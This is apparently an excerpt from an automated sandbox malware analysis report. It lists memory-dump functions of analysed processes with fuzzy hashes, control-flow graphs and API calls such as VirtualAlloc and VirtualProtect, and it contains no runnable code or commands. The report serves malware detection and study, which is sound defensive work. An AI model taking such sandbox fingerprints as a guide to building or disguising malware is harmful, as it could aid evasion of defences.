                                                                                                                            • Opcode ID: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                            • Instruction ID: e0e5915107962139cbaca62c5eb9a2f17f2cc8789a970f78f0fcf3a2fb63c43b
                                                                                                                            • Opcode Fuzzy Hash: 326fddfa3e6338c3e5d2f0e00ff13dfa1b6452360b5d368467cabd64d0f95c06
                                                                                                                            • Instruction Fuzzy Hash: 88D02230B50A040FC70CA63C8C588707390EBAE20278100A8D00BC72B1D92ADC89C740
                                                                                                                            Function 00007FFD9B7A6F10 Relevance: .0, Instructions: 17COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B7A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b7a1000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                            • Instruction ID: 59d7eb29e2d82ea2b3e44cc7a41acb37300601675781a962b97543d00d943001
                                                                                                                            • Opcode Fuzzy Hash: 3f85fd52fba64f279a4f3a6930ff2988cea1587b614e6e9b6eb59ce1dd6ca5eb
                                                                                                                            • Instruction Fuzzy Hash: A1D01234B519044FC71CA63C88998747391EB6A216BD541A9D00AC72B5E96ADD89C741
                                                                                                                            Function 00007FFD9B7882FE Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b780000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e746061befa3360e6d6d7cfca77cb91bc8633c53169afd72dc777b8a19368c7c
                                                                                                                            • Instruction ID: 4ca44f8eacc907ae6cdd9677d211da82e9ab53677971fc2b1005e94d42dccd87
                                                                                                                            • Opcode Fuzzy Hash: e746061befa3360e6d6d7cfca77cb91bc8633c53169afd72dc777b8a19368c7c
                                                                                                                            • Instruction Fuzzy Hash: 6CE0EC30E09A2ECAEBB09B54C8947AC72B2BB08301F9503F5C40DA31A5CB796E819B51
                                                                                                                            Function 00007FFD9B770D34 Relevance: .0, Instructions: 15COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction ID: af6b9e6b75b6f4d44527ea7727e4b1347e76f90f0f256e63133c3acbb990fd7b
                                                                                                                            • Opcode Fuzzy Hash: cef8e4a59299c9b63d0d57e396ed749fdcb38a0b869536986091692cd94c8f30
                                                                                                                            • Instruction Fuzzy Hash: 8CE01234B0930ECBEB10DB94C4D86ED7761EB51711F104765C401872E9DAB86784CA80
                                                                                                                            Function 00007FFD9B7844BD Relevance: .0, Instructions: 12COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b780000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 6b5beece621736278b0277fa8efbda14f8dba455a42a8226cb5bce838bf0c70a
                                                                                                                            • Instruction ID: 13b2e615a1f7443ace1b234628aed51ebfd6bce4fa7f4b745a0fbc7e60dff7c3
                                                                                                                            • Opcode Fuzzy Hash: 6b5beece621736278b0277fa8efbda14f8dba455a42a8226cb5bce838bf0c70a
                                                                                                                            • Instruction Fuzzy Hash: 46D09E70E2891ECEEB58EF94C865ABD76B1BF44304F400179E429A72DADF7829014B40
                                                                                                                            Function 00007FFD9B774960 Relevance: .0, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b770000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 51a622842fcf96832ca322b1f606c19c07287b0db0a2412d4cb86dddb7859198
                                                                                                                            • Instruction ID: d003408bf931aaadc60f9807777e14ee5cf0f8ef7696c357997590abcc462349
                                                                                                                            • Opcode Fuzzy Hash: 51a622842fcf96832ca322b1f606c19c07287b0db0a2412d4cb86dddb7859198
                                                                                                                            • Instruction Fuzzy Hash: 07C08C00F1CE1A06F769A208047127D04029B40608F9003BCE41EC73DECD0C1E0242CB

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FFD9B7806FA Relevance: 9.0, Strings: 7, Instructions: 222COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b780000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =M_^$M_^%$M_^($M_^*$M_^+$M_^2$M_^4
                                                                                                                            • API String ID: 0-667470765
                                                                                                                            • Opcode ID: 0cdd75d6840911683cd9f600df7fa0b06e6b285b0f697333efa4a442bc15c2f9
                                                                                                                            • Instruction ID: 421eb76c31e958a06d09b9ffb66e23cb2caaab5cf4887949753af03d018e5044
                                                                                                                            • Opcode Fuzzy Hash: 0cdd75d6840911683cd9f600df7fa0b06e6b285b0f697333efa4a442bc15c2f9
                                                                                                                            • Instruction Fuzzy Hash: FC51B46BB8D52A4DE31936A839A68FD3705DF61339B0487F3F02F890D79E1C658249C9
                                                                                                                            Function 00007FFD9B78063D Relevance: 7.8, Strings: 6, Instructions: 297COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b780000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =M_^$M_^($M_^*$M_^+$M_^2$M_^4
                                                                                                                            • API String ID: 0-2669795199
                                                                                                                            • Opcode ID: c7363fc0b1ad00004f39f40aa5a3d568aadbdecfa37237fea4cd4a19eae63bcd
                                                                                                                            • Instruction ID: b2d476ffd19997ad234100e74d0fd1db783ce08a0071fe2398154569ae5c5315
                                                                                                                            • Opcode Fuzzy Hash: c7363fc0b1ad00004f39f40aa5a3d568aadbdecfa37237fea4cd4a19eae63bcd
                                                                                                                            • Instruction Fuzzy Hash: 2A81261BB8D92A0DE31877AD79A28FD7701DFA1339B0447F3F16E890D79E18608249D5
                                                                                                                            Function 00007FFD9B7806D3 Relevance: 5.2, Strings: 4, Instructions: 226COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001D.00000002.1879428633.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_29_2_7ffd9b780000_U1jaLbTw1f.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M_^*$M_^+$M_^2$M_^4
                                                                                                                            • API String ID: 0-1616130478
                                                                                                                            • Opcode ID: 40d02c4e7952657098d774033b7051d63839c2f35bbd078d8c461783d0604eae
                                                                                                                            • Instruction ID: c86d23a7e025d968d72934d9aba778a1369aa11ba2357ee5694e651c43545c46
                                                                                                                            • Opcode Fuzzy Hash: 40d02c4e7952657098d774033b7051d63839c2f35bbd078d8c461783d0604eae
                                                                                                                            • Instruction Fuzzy Hash: 6951B12BB8C52A4DE31977A835A68FD3701CF61339B0487F7F16E890DB5E1C658249C9

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:2.9%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:8
                                                                                                                            Total number of Limit Nodes:1
                                                                                                                            execution_graph 20496 7ffd9b75c491 20497 7ffd9b75c49f VirtualAlloc 20496->20497 20499 7ffd9b75c547 20497->20499 20500 7ffd9b75b4ba 20502 7ffd9b75b4c9 20500->20502 20501 7ffd9b75b497 20502->20501 20503 7ffd9b75b575 VirtualProtect 20502->20503 20504 7ffd9b75b5ae 20503->20504

                                                                                                                            Executed Functions

                                                                                                                            Function 00007FFD9B750D48 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b750000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5\_H
                                                                                                                            • API String ID: 0-3325266018
                                                                                                                            • Opcode ID: bd58a1b47c7585b9d7eb54e09e54c379da74e7b2c8c7755e2397cf2a48d9f431
                                                                                                                            • Instruction ID: fa3f52b5c7ccc2828c989ac1b96ba5d93985088c69d6cd9f9a97d6e55fdb7ed5
                                                                                                                            • Opcode Fuzzy Hash: bd58a1b47c7585b9d7eb54e09e54c379da74e7b2c8c7755e2397cf2a48d9f431
                                                                                                                            • Instruction Fuzzy Hash: F99105B5A1DA8D4FE799DFA888797A97FE4FF5A310F0401BAD049C72E2DAB814118740
                                                                                                                            Function 00007FFD9B761752 Relevance: 2.2, Strings: 1, Instructions: 949COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 7ffd9b761752 1 7ffd9b761757-7ffd9b76177d 0->1 4 7ffd9b7618d1-7ffd9b7618fb 1->4 5 7ffd9b761783-7ffd9b7617ae 1->5 10 7ffd9b7618fd-7ffd9b76191a 4->10 11 7ffd9b761947-7ffd9b76194a 4->11 15 7ffd9b7617bd-7ffd9b761845 5->15 16 7ffd9b7617b0-7ffd9b7617ba 5->16 17 7ffd9b761920-7ffd9b761945 10->17 18 7ffd9b761a8b-7ffd9b761a93 10->18 14 7ffd9b761951-7ffd9b761958 11->14 19 7ffd9b76195a-7ffd9b761967 14->19 51 7ffd9b76188c-7ffd9b76188f 15->51 52 7ffd9b761847-7ffd9b76188a 15->52 16->15 17->11 24 7ffd9b761a94-7ffd9b761a99 18->24 23 7ffd9b76196e-7ffd9b761986 19->23 36 7ffd9b761a2c-7ffd9b761a42 23->36 37 7ffd9b76198c-7ffd9b7619df 23->37 27 7ffd9b761a9b-7ffd9b761aaf 24->27 28 7ffd9b761a47-7ffd9b761a62 24->28 31 7ffd9b761c4d-7ffd9b761c4e 27->31 43 7ffd9b761a69-7ffd9b761a84 28->43 34 7ffd9b761c55-7ffd9b761c61 31->34 35 7ffd9b761c50 call 7ffd9b762918 31->35 35->34 36->31 37->43 58 7ffd9b7619e5-7ffd9b7619f0 37->58 43->18 53 7ffd9b761891-7ffd9b7618a2 51->53 54 7ffd9b7618a4-7ffd9b7618a5 51->54 59 7ffd9b7618b1-7ffd9b7618cb 52->59 53->59 54->59 61 7ffd9b760f9d-7ffd9b760fdc 58->61 62 7ffd9b7619f6-7ffd9b761a00 58->62 59->4 59->5 73 7ffd9b760fde-7ffd9b761149 61->73 62->24 63 7ffd9b761a06-7ffd9b761a26 62->63 63->36 63->37 98 7ffd9b76114b-7ffd9b761154 73->98 99 7ffd9b761178-7ffd9b7611b9 73->99 101 7ffd9b76115a-7ffd9b76116a 98->101 102 7ffd9b761699-7ffd9b7616cf 98->102 111 7ffd9b7611ce-7ffd9b761243 99->111 112 7ffd9b7611bb-7ffd9b7611cd 99->112 105 7ffd9b761170-7ffd9b761174 101->105 113 7ffd9b7616d1-7ffd9b761710 102->113 114 7ffd9b761748-7ffd9b761751 102->114 105->99 129 7ffd9b761274-7ffd9b7612c3 111->129 130 7ffd9b761245-7ffd9b76126e 111->130 112->111 123 7ffd9b761712-7ffd9b761715 113->123 124 7ffd9b76172a-7ffd9b761746 113->124 114->0 123->124 125 7ffd9b761717-7ffd9b761727 123->125 124->113 124->114 125->124 138 7ffd9b7612cf-7ffd9b761307 129->138 139 7ffd9b7612c5-7ffd9b7612ca 129->139 130->129 144 7ffd9b761313-7ffd9b76134b 138->144 145 7ffd9b761309-7ffd9b76130e 138->145 140 7ffd9b761683-7ffd9b761693 139->140 140->102 140->105 149 7ffd9b76134d-7ffd9b761352 144->149 150 7ffd9b761357-7ffd9b76138f 144->150 145->140 149->140 154 7ffd9b761391-7ffd9b761396 150->154 155 7ffd9b76139b-7ffd9b7613d3 150->155 154->140 159 7ffd9b7613df-7ffd9b761417 155->159 160 7ffd9b7613d5-7ffd9b7613da 155->160 164 7ffd9b761423-7ffd9b76145b 159->164 165 7ffd9b761419-7ffd9b76141e 159->165 160->140 169 7ffd9b76145d-7ffd9b761462 164->169 170 7ffd9b761467-7ffd9b76149f 164->170 165->140 169->140 174 7ffd9b7614a1-7ffd9b7614a6 170->174 175 7ffd9b7614ab-7ffd9b7614e3 170->175 174->140 179 7ffd9b7614ef-7ffd9b761527 175->179 180 7ffd9b7614e5-7ffd9b7614ea 175->180 184 7ffd9b761533-7ffd9b76156b 179->184 185 7ffd9b761529-7ffd9b76152e 179->185 180->140 189 7ffd9b76156d-7ffd9b761572 184->189 190 7ffd9b761577-7ffd9b7615af 184->190 185->140 189->140 194 7ffd9b7615b1-7ffd9b7615b6 190->194 195 7ffd9b7615bb-7ffd9b7615c4 190->195 194->140 195->140
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: O_H
                                                                                                                            • API String ID: 0-1880849852
                                                                                                                            • Opcode ID: 384ea34d41ed0ffb6955213e0b82408117517080254d0a502cef4fed3a101e8e
                                                                                                                            • Instruction ID: 4d75e9e3c851feb4233b2196ebed2e4de45181a6808ce6d8a2abbfe8d7f7b4de
                                                                                                                            • Opcode Fuzzy Hash: 384ea34d41ed0ffb6955213e0b82408117517080254d0a502cef4fed3a101e8e
                                                                                                                            • Instruction Fuzzy Hash: E162A661B19A4E8FE7A8EB68C4A567873D2FF98340F0506B9D00EC36F6DD24BD429741
                                                                                                                            Function 00007FFD9B75B453 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B757000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B757000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b757000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5d9d7c0dc5f67ab43dfb48ea8774dcc72cc8d1c68aa4f3fb1de156677b18b79f
                                                                                                                            • Instruction ID: 6ace0a3858270ae1aaba6061e5a9bf3fd499cb496566d8d9cfc22aa8eac83ee2
                                                                                                                            • Opcode Fuzzy Hash: 5d9d7c0dc5f67ab43dfb48ea8774dcc72cc8d1c68aa4f3fb1de156677b18b79f
                                                                                                                            • Instruction Fuzzy Hash: 7E410E32A0D78C4FE7299B98AC165F97BE1EB46331F04427FD089C31A3DA6564078791
                                                                                                                            Function 00007FFD9B75B4BA Relevance: 1.6, APIs: 1, Instructions: 142memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 215 7ffd9b75b4ba-7ffd9b75b4c7 216 7ffd9b75b4d2-7ffd9b75b4e3 215->216 217 7ffd9b75b4c9-7ffd9b75b4d1 215->217 218 7ffd9b75b4ee-7ffd9b75b4fa 216->218 219 7ffd9b75b4e5-7ffd9b75b4ed 216->219 217->216 220 7ffd9b75b4fc-7ffd9b75b5ac VirtualProtect 218->220 221 7ffd9b75b497 218->221 219->218 228 7ffd9b75b5b4-7ffd9b75b5dc 220->228 229 7ffd9b75b5ae 220->229 223 7ffd9b75b499-7ffd9b75b49a 221->223 224 7ffd9b75b4a5-7ffd9b75b4b6 221->224 223->224 229->228
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B757000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B757000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b757000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 544645111-0
                                                                                                                            • Opcode ID: 9788dd766ce68cb527076bc651b3f554f0e9bacbbc9cd9da9529b53452f4974b
                                                                                                                            • Instruction ID: f9ece2dd9a0edae3e7a7f213d324663962268ce1428f1ad100efc651bcc5ff0b
                                                                                                                            • Opcode Fuzzy Hash: 9788dd766ce68cb527076bc651b3f554f0e9bacbbc9cd9da9529b53452f4974b
                                                                                                                            • Instruction Fuzzy Hash: AC411D3190D78C4FD72A9BA898166F97FE0EF56321F0443AFD099C32A3CA746406C792
                                                                                                                            Function 00007FFD9B75C491 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 273 7ffd9b75c491-7ffd9b75c49d 274 7ffd9b75c4a1-7ffd9b75c4dd 273->274 275 7ffd9b75c49f 273->275 276 7ffd9b75c4e1-7ffd9b75c546 VirtualAlloc 274->276 275->274 275->276 279 7ffd9b75c547-7ffd9b75c552 276->279 280 7ffd9b75c554 279->280 281 7ffd9b75c55a-7ffd9b75c582 279->281 280->281
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B757000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B757000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b757000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: fba2ce66cde013f0d42e8c63ed9801e8c404fddf514d0864e8ece027867b0ba3
                                                                                                                            • Instruction ID: 044ffb68b037bb069ff7ad4e00c6b43025b81bf996d05ed2249c1fd4d689a4eb
                                                                                                                            • Opcode Fuzzy Hash: fba2ce66cde013f0d42e8c63ed9801e8c404fddf514d0864e8ece027867b0ba3
                                                                                                                            • Instruction Fuzzy Hash: D2310C31A0CB4C5FDB1DABA898166F97BF0EF56321F04426FE04AC3553DA646816C7D1
                                                                                                                            Function 00007FFD9B781A49 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 299 7ffd9b781a49-7ffd9b781a7a 300 7ffd9b781a7e-7ffd9b781a83 299->300
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: H
                                                                                                                            • API String ID: 0-2852464175
                                                                                                                            • Opcode ID: b550958b2c23272b5f4ba2af651282fe4a4256ec27859a32dccf222197b57efc
                                                                                                                            • Instruction ID: 836543b6ba14a2e6e4b838e3828d27d3c7859bf891f75d33e7ede7017829bc49
                                                                                                                            • Opcode Fuzzy Hash: b550958b2c23272b5f4ba2af651282fe4a4256ec27859a32dccf222197b57efc
                                                                                                                            • Instruction Fuzzy Hash: 33E02031F557844FCB0D9A2C88644607BB1EF67215B8552FBC046CB193ED1CDC86C741
                                                                                                                            Function 00007FFD9B78A529 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 303 7ffd9b78a529-7ffd9b78a53d 304 7ffd9b78a53f-7ffd9b78a55a 303->304 305 7ffd9b78a55e-7ffd9b78a563 304->305
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 0b939677575ab9284909298ed49471f4727b442425943699eafb035662cc1cb5
                                                                                                                            • Instruction ID: 4307a4f8489ad8127fe18d0f67261a95ab1e6716a412ce43c632ce8170589bea
                                                                                                                            • Opcode Fuzzy Hash: 0b939677575ab9284909298ed49471f4727b442425943699eafb035662cc1cb5
                                                                                                                            • Instruction Fuzzy Hash: E5E0656160E7C44FC716D6344869454BFA0EF6721174A42EEC045CF1A3EA2D8885CB01
                                                                                                                            Function 00007FFD9B763ED9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 301 7ffd9b763ed9-7ffd9b763f0a 302 7ffd9b763f0e-7ffd9b763f13 301->302
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B760000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B760000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b760000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: M
                                                                                                                            • API String ID: 0-3664761504
                                                                                                                            • Opcode ID: 733bdc2ed6a18e58c66afe4f0743990d4795a5799f5832870dfce68560a7b29b
                                                                                                                            • Instruction ID: 00125d279a7668b1f2fd2d8ac88dfb6ce38d3f2660d38ede62a92a76f0bbaa2c
                                                                                                                            • Opcode Fuzzy Hash: 733bdc2ed6a18e58c66afe4f0743990d4795a5799f5832870dfce68560a7b29b
                                                                                                                            • Instruction Fuzzy Hash: 10E06D2160E3C04FCB1AAB748869854BF60EE6720174A42EFC086CF5A3EA2D8889C701
                                                                                                                            Function 00007FFD9B781AD9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 309 7ffd9b781ad9-7ffd9b781aed 310 7ffd9b781aef-7ffd9b781b04 309->310 311 7ffd9b781b08-7ffd9b781b0d 310->311
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: e739f5ca0f27adfe10c54e11ecfd285b3a4808e413f42d077edd9cfd52d20fc3
                                                                                                                            • Instruction ID: 72599f7c9563e886584fba688920104c43d848c5839ac884eb5021e6365c4d46
                                                                                                                            • Opcode Fuzzy Hash: e739f5ca0f27adfe10c54e11ecfd285b3a4808e413f42d077edd9cfd52d20fc3
                                                                                                                            • Instruction Fuzzy Hash: 3FE01A6154F7C44FCB16EB7488A98457FA0EE6B21178B41EEC089CF1B3E62D8849CB01
                                                                                                                            Function 00007FFD9B787E19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 312 7ffd9b787e19-7ffd9b787e44 314 7ffd9b787e48-7ffd9b787e4d 312->314
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B781000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B781000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b781000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 811cbad05ce20ed3468c8e9c76a646146cc93f0c5c1653d3095583cc9a18c11f
                                                                                                                            • Instruction ID: e8869aa9dc1c55c6dabfe5a37466dbaf7692662a000ce4d853f505cb17f9a3d9
                                                                                                                            • Opcode Fuzzy Hash: 811cbad05ce20ed3468c8e9c76a646146cc93f0c5c1653d3095583cc9a18c11f
                                                                                                                            • Instruction Fuzzy Hash: 76E01A6154F7C44FCB16EB7488A98447FA1AE6721178B41EEC186CF1B3E62D8849C701
                                                                                                                            Function 00007FFD9B7793E9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 306 7ffd9b7793e9-7ffd9b779414 308 7ffd9b779418-7ffd9b77941d 306->308
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001E.00000002.1879309910.00007FFD9B773000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B773000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_30_2_7ffd9b773000_UserOOBEBroker.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: I
                                                                                                                            • API String ID: 0-3707901625
                                                                                                                            • Opcode ID: 18eecda80c365914984ad969bd45b1530cc817046941bad647aee8443c615ad2
                                                                                                                            • Instruction ID: 0dee9b1b6f8a53ff91157cb483bc4ee3b148d10756932081db076d98a5dceee8
                                                                                                                            • Opcode Fuzzy Hash: 18eecda80c365914984ad969bd45b1530cc817046941bad647aee8443c615ad2
                                                                                                                            • Instruction Fuzzy Hash: 7AE0E56154E7C48FCB56EA7488AA8547FA0EE6721078A41EEC089CB1B3E6299849C701
                                                                                                                            Function 00007FFD9B7795D1 Relevance: .3, Instructions: 318COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            Memory Dump Source
